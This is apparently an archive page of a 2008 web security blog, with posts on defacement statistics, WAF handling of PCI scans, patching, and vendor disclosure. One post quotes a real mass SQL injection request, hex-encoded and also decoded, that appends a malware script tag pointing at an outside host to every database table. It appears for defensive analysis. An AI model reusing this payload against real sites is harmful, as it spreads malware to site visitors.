Friday, August 29, 2008

Lessons Learned from Zone-H Statistics Reports

Submitted by Ryan Barnett 8/29/2008

I may be in the minority by stating the following, however, I believe that web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Defacement statistics are valuable as they are one of the few incidents that are publicly facing and thus can not easily be swept under the rug.

The reason why I feel in the minority with this concept is that most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
RISK = THREAT x VULNERABILITY x IMPACT


The resulting risk of a web defacement might be low because the the impact may not be deemed a high enough severity for particular organizations. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decided to not simply alter some homepage content and instead decided to do something more damaging? This is exactly what I believe is starting to happen. More on that later.

Zone-H Statistics Report for 2005-2007
Zone-H is a clearing house that has been tracking web defacements for a number of years. In March of 2008, they released a statistics report which correlated data from a 3 year window - 2005 - 2007. This report revealed some very interesting numbers.

What Attacks Were Being Used?
The first piece of data that was interesting to me was the table which listed the various attacks that were successfully employed which resulted in enough system access to alter the web site content.

Attack Method Total 2005 Total 2006 Total 2007
Attack against the administrator/user (password stealing/sniffing)
48.006207.323141.660
Shares misconfiguration 39.02036.52967.437
File Inclusion 118.395148.08261.011
SQL Injection
36.25347.21235.407
Access credentials through Man In the Middle attack 20.42721.20928.046
Other Web Application bug 50.3836.52918.048
FTP Server intrusion 58.94555.61117.023
Web Server intrusion 38.97530.05913.405
DNS attack through cache poisoning 7.5419.1319.747
Other Server intrusion 1.473216.0508.050
DNS attack through social engineering 4.7195.9597.585
URL Poisoning 2.8977.9886.931
Web Server external module intrusion 8.48717.2906.690
Remote administrative panel access through bruteforcing 2.7384.9886.607
Rerouting after attacking the Firewall 9884.3086.127
SSH Server intrusion 2.64414.7465.723
RPC Server intrusion
1.8215.7935.516
Rerouting after attacking the Router 1.5204.8675.257
Remote service password guessing
9397.0085.105
Telnet Server intrusion 1.8636.2524.753
Remote administrative panel access through password guessing 1.01444164.753
Remote administrative panel access through social engineering
78054723.127
Remote service password bruteforce 3.57640183.125
Mail Server intrusion 1.19841951.315
Not available
11.382372439.724

Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept that was re-enforced was the fact that the majority of attack vectors had absolutely nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even DNS cache poisoning which would give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.

Lesson Learned #2 - Vulnerability Statistics Don't Directly Equate to Attack Vectors used in Compromises
There are many community projects and resources available that track web vulnerabilities such as; Bugtraq, CVE and OSVDB. These are tremendously useful tools for gaging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, a project such as the WASC Web Application Security Statistics Project or the statistics recently released by Whitehat Security provide further information about vulnerabilities that are remotely exploitable in both public and custom code applications. All of this data helps to define both the overall attack surfaces available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what COULD be exploited however there must be a threat (attacker) and a desired outcome (such as a website defacement).

If an organization wants to prioritize which vulnerabilities they should address first, one way to do this would be to identify the actual vulnerabilities that are being exploited in real incidents. The data presented in the Zone-H reports helps to shed light on this area. Additionally, the WASC Web Hacking Incidents Database (WHID) also includes similar data however it is solely focused on web application-specifc attack vectors.


Incident by attack method


You may notice, for example, that although XSS is currently the #1 most common vulnerability present in web applications, it is not the most often used attack vector. That distinction goes to SQL Injection. This makes sense if you think about this from the attacker's perspective. Which is easier -
  • Option #1
    • Identify an XSS vulnerability within a target website
    • Send the XSS code to the site
    • Either wait for a client to access the page you have infected or alternatively try and entice someone to click on a link on another site or in an email
    • Hopefully your XSS code was able to grap the victim's session id and send it to your cookie trap url
    • You then need to quickly use that session id to try and log into the victim's account.
    • You can then try and steal sensitive info
  • Option #2
    • Identify an SQL Injection vector in the web app
    • Send various injection variants until you fine tune it
    • Extract out the customer data directly from the back-end DB table
Option #2 is obviously much easier as it cuts out the middle-man (the client) and goes directly through the web app to get to the desired data. What I am seeing in the field in working with Breach Security customers is that attackers are focusing more and more on criminal activities that in some way, shape or form will help them to get money. As Rod Tidwell so eloquently put it in the movie Jerry Maquire - Show Me The Money!

Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
In keeping with the monetary theme from the previous section, another interesting trend is emerging with regards to web defacements. In all of the previous Zone-H reports, there was always a steady increase in the number of yearly defacements averaging ~30%/year. In 2007, however, they noticed a significant 37% decrease going from 752,361 in 2006 to 480,905. Obviously the number of targets is not going down and the overall state of web application security is pretty poor, so what could account for the decrease in numbers?

It is my estimation that the professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially the web defacers already have access to systems so they have a service to offer. It used to be that the web site data itself was the only thing of value, however, now we are seeing that using legitimate websites as a malware hosting platform is providing massive scale improvements for infecting users. So, instead of overtly altering website content and proclaim their 3l33t hzx0r ski77z to the world, they are rather quitely adding malicious javascript code to the sites and are making money from criminal organizations and/or malware advertisers by infecting home computer users.

Take a look at the following chart from the WHID Report -

Attack Goal

%

Stealing Sensitive Information

42%

Defacement

23%

Planting Malware

15%

Unknown

8%

Deceit

3%

Blackmail

3%

Link Spam

3%

Worm

1%

Phishing

1%

Information Warfare

1%




Incident by outcome

You can see that Defacements account for 23% while Planting Malware is right behind it at 15%. It is my opinion that the majority of people who are executing defacements will continue to migrate over and start installing malware in order to make money. This is one of the only plausible explanations that I have to account for the dramatic decrease in the number of defacements.

What is somewhat humorous about this trend is that I actually mentioned the concept of defacers making "non-apparent" changes to site content in my Preventing Web Site Defacements presentation way back in 2000. Looks like I was about 8 years ahead of the curve on that one :)

Wednesday, August 27, 2008

More PCI Confusion: How Should WAFs Handle ASV Traffic?

Submitted by Ryan Barnett 8/27/2008

I have previously discussed the importance of sharing data between code reviews, vulnerability scanning and web applications firewalls. The main issue being that these three processes/tools are usually run by three different business units - development, information security and operations staff - and they don't all share their output data with each other. The issue of sharing output data, however, is putting the cart before the horse. When looking at vulnerability scanning, you need to first decide what the goal of scanning is and then you can select the appropriate WAF configuration for handling the traffic.

What is the ASV Scanning Goal?
There seems to be two different goals that ASVs may have for scanning; 1) To identify all vulnerabilities within a target web application, or 2) To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker. You may want to read that again to make sure that you understand the difference as this is the point that I will be discussing for the remainder of this post.

Identifying Underlying Vulnerabilities
This is a critical goal to have when scanning. If you can identify all of the existing vulnerabilities, or at least those which can be identified by scanning, you can then formulate a remediation plan to address the issue at the root cause. Remediation should include both source code fixes and custom rules within a WAF for protection in the interim.

WAF Event Management
From a WAF administration perspective, it is important to have proper configuration so as to allow for the vulnerability scanning goal while simultaneously not flooding the alert interfaces with thousands of events from ASV traffic. This data may impact both the overall performance of the WAF and it may skew reporting outputs that include raw attack data.

Option #1 - Whitelist the ASV Network Range
In order to identify all of the actual vulnerabilities, you will need to allow the ASV to interact completely with the back-end web application.

Pro(s)
  • Identification of vulnerabilities and information leakages within the web application
  • From a WAF event management perspective, this configuration will eliminate alerts generated by the scans
Con(s)
  • Reduces the true accuracy of the scans as it does not simulate what a “normal” attacker would be able to access since the WAF is not blocking inbound attacks and outbound information leakages such as SQL Injection error messages which attackers use to fine tune their attacks.
  • PCI QSAs may interpret these scan results in a negative way if the WAF blocking aspect is not considered as a compensating control in Requirement 6.6.
Option #2 - Treat ASV Traffic Like Any Other Client
Pro(s)
  • Gives a truer picture of what an attacker would/wouldn’t be able to exploit since the WAF is providing its normal protections.
Cons(s)
  • Vulnerabilities within the web application may not be identified and therefore are not being remediated through other means.
  • This configuration will generate tons of alerts especially if the scan frequency is high (daily).
Option #3 - Run Before and After Scans
If you coordinate with your ASV, you could conduct 2 different scans – one when the ASV range is whitelisted and one without.

Pro(s)
  • It allows for the identification of vulnerabilities.
  • This is advantageous as it shows the immediate ROI of a WAF as a compensating control for PCI.
Con(s)
  • It is important to note and be aware that if you take this approach that you need to make sure that your QSA knows and does NOT only look at the whitelisted scan data.
Option #4 - Use a Block but Don't Log Configuration for ASVs
One other option you might want to consider and is a “Block but don’t log” configuration which is a hybrid approach that is suitable for day to day use. With this setup, you allow the WAF to block requests/responses when it sees attacks but it will then inspect the IP address range and if it is coming from an ASV it will not generate alerts. To me, this the best approach for day to day scanning as anything that pops up in the ASV scan reports is something that the WAF did not block and should be addressed.

Some ASVs Arguing that a WAF Shouldn't Ever Block Them
I have run into an interesting webappsec scenario while presenting on PCI at conferences (such as the recent SANS What Works in Web Application Security Summit in Vegas). The attendees have started complaining that many ASVs are requiring that organizations only use the whitelist approach so that the vulnerability scans will pass directly through the WAF and interact with the back-end web application unencumbered. The ASVs are citing the following section in the PCI Security Scanning Procedures document -

13. Arrangements must be made to configure the intrusion detection system/intrusion prevention system (IDS/IPS) to accept the originating IP address of the ASV. If this is not possible, the scan should be originated in a location that prevents IDS/IPS interference

Obviously, these ASVs are lumping WAFs in with network IDS/IPS devices in this context. In reading this section, it seems to me that the real intent of this setting is that organizations should not "cheat" and configure these devices to automatically block or disrupt (with TCP Resets) connections coming from the ASV range based SOLELY on the IP address. This would not allow the scanning to inspect the site at all. Basically you can not blacklist the ASV IP range. This makes sense as this configuration would make the vulnerability scan reports come up clean but it would not be a realistic picture of what a real attacker would be able to access.

What About VA + WAF Integration?

What is frustrating with this whitelisting hard line stance is that this approach effectively negates the valuable Vulnerability Assessment + WAF Integration efforts that have recently appeared - most notably between Breach and Whitehat Security. If a WAF is not allowed to block requests coming from an ASV, then how are the ASV reports ever going to show that the issues has been remediated by a virtual patch?

Look at the following sections for PCI Requirement 11.2

11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).

Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.

11.2.a Inspect output from the most recent four quarters of network, host, and application vulnerability scans to verify that periodic security testing of the devices within the cardholder environment occurs.

Verify that the scan process includes rescans until “clean” results are obtained


11.2.b To verify that external scanning is occurring on a quarterly basis in accordance with the PCI Security Scanning Procedures, inspect output from the four most recent quarters of external vulnerability scans to verify that

• Four quarterly scans occurred in the most recent 12-month period

The results of each scan satisfy the PCI Security Scanning Procedures (for example, no urgent, critical, or high vulnerabilities)

• The scans were completed by a vendor approved to perform the PCI Security Scanning Procedures

Notice the bolded sections. The problems that the organizations are encountering is that if they do indeed whitelist the ASV IP addresses, then the resulting scan reports will show vulnerabilities that a real attacker would most likely not be able to exploit because the WAF would be in blocking mode for them or they have implemented a virtual patch. So, if a QSA looks at the ASV scans and sees a bunch of urgent/critical/high vulns (SQL Injection, XSS, etc…) then the organization may fail this section. :(

Clarifications Needed

I believe that the PCI Security Counsel needs to update the text in the ASV Scanning Procedures guide to make it more clear how WAFs should be configured in relation to PCI scanning. As the very least, they should clarify the original intent of that text (as I stated previously I believe it was to prevent sites from blacklisting the ASV address ranges).

I am interested in hearing peoples experiences with this situation. What have ASVs told you? How do you configure your WAFs to handle ASV traffic?

Tuesday, August 26, 2008

Mass SQL Injection Attacks Now Targeting PHP Sites

Submitted by Ryan Barnett 8/26/2008

As most of you already have heard, or have faced yourselves, the mass SQL Injection attacks are still going strong on the web - Mass SQL Attack a Wake-up Call for Developers.

The Game Has Changed
Previously criminals had a tough time creating scripts that would mass exploit web applications. This was mainly due to website running custom coded apps. No two sites were the same. This means that attackers didn’t have access to the target code so they were forced to conduct manual reconnaissance probes to enumerate database structures (such as in the previous real attack). This meant that if an attacker wanted to extract out customer credit card data from a back-end database, they would be forced to run reconnaissance probes in order to enumerate the database structure and naming conventions. This manual probing offered defenders time to identify and react to attacks before successful compromise of customer data.

Now, these SQL Injection scripts can generically inject data into any vulnerable sites without prior knowledge of the database structure. They accomplish this by using multiple sql commands to essentially create a script that will generically gather then loop through all table names and append on some malicious javascript that points to malware on a 3rd party site.

A "skeleton key" attack if you will. Brutal...

The attacks have mainly been targeting IIS/ASP/MS-SQL sites up to this point. For example, I recently received this example attack log from a ModSecurity user which shows the SQL Injection payload -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20
VARCHAR(4000);SET%20@S=CAST(0x4445434c41524520405420
5641524348415228323535292c4043205641524348415228323535
29204445434c415245205461626c655f437572736f722043555253
4f5220464f522053454c45435420612e6e616d652c622e6e616d652
046524f4d207379736f626a6563747320612c737973636f6c756d6
e73206220574845524520612e69643d622e696420414e4420612e
78747970653d27752720414e442028622e78747970653d393920
4f5220622e78747970653d3335204f5220622e78747970653d323
331204f5220622e78747970653d31363729204f50454e205461626
c655f437572736f72204645544348204e4558542046524f4d20546
1626c655f437572736f7220494e544f2040542c4043205748494c4
528404046455443485f5354415455533d302920424547494e20455
845432827555044415445205b272b40542b275d20534554205b27
2b40432b275d3d525452494d28434f4e56455254285641524348415
22834303030292c5b272b40432b275d29292b27273c7363726970
74207372633d73646f2e313030306d672e636e2f63737273732f77
2e6a733e3c2f7363726970743e27272729204645544348204e4558
542046524f4d205461626c655f437572736f7220494e544f2040542
c404320454e4420434c4f5345205461626c655f437572736f722044
45414c4c4f43415445205461626c655f437572736f7220%20AS%20
VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
If we decode the HEX encoded SQL data, we get this -
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Fortunately for this user, ModSecurity has rules that easily detected and blocked this attack.

The theory is that the SQL injection code could be updated to compromise other platforms such as PHP, etc... Well, I have been doing some research and I am finding evidence of PHP sites that have been infected. For example, if you do a google search looking for PHP sites that have the same javascript code as the example that was sent to me, you will see approximately 3,150 site PHP sites are currectly infected.
Technical Sidenote - what is interesting with these PHP sites is that even though their web applications are not filtering client input and their DB queries are not secure, they are actually able to prevent the goal of this attack since the PHP code is properly html encoding the output sent to the clients :)
What I am not sure of is whether then attack code itself has indeed changed (to target other back-end DBs) or if the victim site is using a PHP front-end with a MS-SQL back-end… If you have any logs of these attacks where they are targeting PHP pages (instead of ASP/ASPX), please share them with me or post them here.

Monday, August 25, 2008

On Your Marks, Get Set, Go: Vulnerability Mitigation Race

Submitted by Ryan Barnett 8/25/2008

Now that the 2008 Olympics have drawn to a close, I wanted to post this entry as the track and field events inspired this analogy.

In many ways vulnerability remediation is like a Track and Field race and the firing of the starters pistol is the public vulnerability announcement. The goal of the race is to be the first one to either exploit or patch a vulnerability. The participants in the race may include;

1) Organizations running the vulnerable application,

2) Attackers looking to exploit the vulnerabilty manually

3) The odds on favorite to win the race - an automated worm program.

Oraganizations looking to mitigate or patch their systems are the long-shots to win this race. Let's look at a breakdown of the challenges that organizations face:

Not Hearing the Starter's Pistol

Unfortunately, many organizations don't realize that they are even in a race! This can be attributed poor monitoring of vulnerability alerts. If you aren't signed up on your Vendor's mail-list or you don't have someone checking out US-CERT or the SANS Internet Storm Center (ISC) daily then you are immediately giving the attackers a 50 yard lead in this race...

What Do You Mean We Don't Have The Baton?

If you are running in a relay race, you need to have a baton to pass to each memeber of your team. In this case, the baton is the vendor's security patch. You might be ready, willing and able to start the patching process, however if the vendor doesn't release the patch, you can't really start the race then can you?

Not Getting A Clean Handoff

Each leg of the relay could be though of as a step in the patching process such as installation on a test host, then pushing the patch out to development, then regression testing and finally out to production. As each phase completes its tasks, it then needs to notify the next group and "hand off the baton" so they can move forward with testing. If this doesn't happen, then the patch will never make it to the finish line - which is when the patches are applied to production hosts. I can't tell you how many times I have seen customers who have patches that make through one or two phases but then just seem to fall off the priority list.

Getting Disqualified

In a relay race, if you step outsite of your lane, then can be disqualified. Similarly, if a security patch ever causes any sort of disruption to normal service then the patch is usually not applied. If there are problems during regression testing, then odds are that the security patch will not make it to the finish line. In the end, functionality will always trump security.

Let's Not Pull A Hamstring

Many organizations want to minimize being disqualified so they take a rather slow, methodical approach to the race and decide just to walk it. These are the organizations who only have quarterly downtime for patching. These companies may get a ribbon for participation but they will never win the race.

Don't Have A Lane To Run In

What happens if you are not able to apply any patches at all to your web application? Two valid scenarios may be companies who have outsourced the development of their web application and/or who are using an older version of a COTS product where the vendor is no longer providing patches. What options are left for these companies to compete in this race?

Evening The Odds

So, where does that leave us then? Is there anything that organizations can do the even the playing field in this race? The answer is yes. Virtual Patching can help by providing immediate mitigations to the vulnerability. If an organization were to implement a Virtual Patch on a web application firewall, this will act as a stop-gap measure to prevent remote exploitation of the vulnerability until the actual patch is applied. Using the relay race analogy again, this would be like forcing the attackers to run a steeplechase type of race where there are water pits and 10 ft. tall hurdles in their lane while you are allowed to run a normal race without any obstacles. In this type of scenario, you have a much better chance of beating the attackers to the finish line and protecting your web applications.

Wednesday, August 6, 2008

Microsoft and Oracle Helping "Time-to-Fix" Problems

Submitted by Ryan Barnett 8/6/2008

Before I talk to the title of this post, I have to provide a little back story. I have had an ongoing DRAFT blog post whose subject was basically a rant against many vendors who were unwilling to offer vulnerability details. Every now and then I would review and update it a bit, but I never got to the point of actually posting it. I figured it wouldn't do much good in the grand scheme of things and the mere act of updating it provided adequate cathartic relief that a public post was not required. There has been some recent developments, however that has allowed me to dust off my post and to put a "kudos" spin on it :)

I have long been a proponent of providing options for people to mitigate identified vulnerabilities. We all realize that the traditional software patching process takes way too long to complete and push out into production when considering that the time it takes for the bad guys to create worm-able exploit code is usually measured in days. When you combine this with most vendor's vulnerability disclosure policies (which is essentially not to disclose any details), then it is obvious that the bad guys have a distinct advantage in this particular arms race...

Ideally, all vulnerability researchers would work with the vendor and they would jointly release details with patches and then customers would immediately implement them on production hosts. Unfortunately, reality is much different. Researchers often have their
own agendas and decided to release vulnerability details on their own. In these cases, the end users have no mitigation options provided by the vendor and are thus exposed to attacks. For those situations where the researchers and the vendor work together, then the end user at least has a fix that they can apply. The problem is that the standard time-to-fix for organizations to test and install patches is usually a couple months. So, the vendor has pushed the pig over the fence onto the customer and essentially takes a "it's now your problem now" approach.

What would be useful would be some technical details on the vulnerabilities that are addressed within the patches. Let's take a look at Oracle's
position on public disclosure. The fact that this is Oracle is irrelevant as many vendors share this same view and that is that they don't want to disclose any technical details of a vulnerability BEFORE patches are released. I really can't fault them for this stance as they want to ensure that they have patches ready. What I am focusing on here is when they have a patch set ready, they should provide enough technical details about the vulnerability so that an organization can implement some other mitigation options until the actual patches are installed. Unfortunately, the vendors position is that they didn't want to release the details as to prevent the bad guys from obtaining the info. What they are missing, however, is that both the good guys (Sourcefire, iDefense, etc...) and the bad guys are reverse engineering the vendors patches to uncover the details about the vulnerability. The only people who don't have any details are the end users.

So the point is that Pandora is already out of the box when vendors release patches. What they should do then is to give technical details for security folks to implement some defenses (for IDSs/IPSs). A great example of this is when bleeding edge/emerging threats folks would create Snort signatures so that an organization can identify if someone is attempting to exploit a flaw.

Now, the whole point of this post is to highlight that I have been fighting the good fight with many vendors to try and get them to see the light on the value of either releasing technical details on web-based vulnerabilities so that end users can create virtual patches with a web application firewall, or even better, for the vendor to release some virtual patches themselves (using the ModSecurity rules language). Well, we haven't achieved the latter one yet but we are seeing signs that both Oracle and Microsoft are starting to address the former. Specifically, Oracle/BEA recently released details about a
WebLogic plug-in for Apache and in the mitigation section they actually mentioned the use of ModSecurity to address the problem! That is a huge step and something that I am extremely excited about. Then just within the last week we saw the announcement of Microsoft's Active Protections Program (MAPP). Here is the short overview -

The Microsoft Active Protections Program (MAPP) is a new program that will provide vulnerability information to security software providers in advance of Microsoft Corp.’s monthly security update release. By receiving vulnerability information earlier, security software providers can give customers potential improvements to provide security protection features, such as third-party intrusion detection systems, intrusion prevention systems or security software signatures.
This is certainly an interesting initiative and may help organizations to receive more timely mitigation options to help protect themselves until the official patches are deployed.

Overall, I have have say GREAT job Oracle and Microsoft for truly helping your customers to close their time-to-fix windows.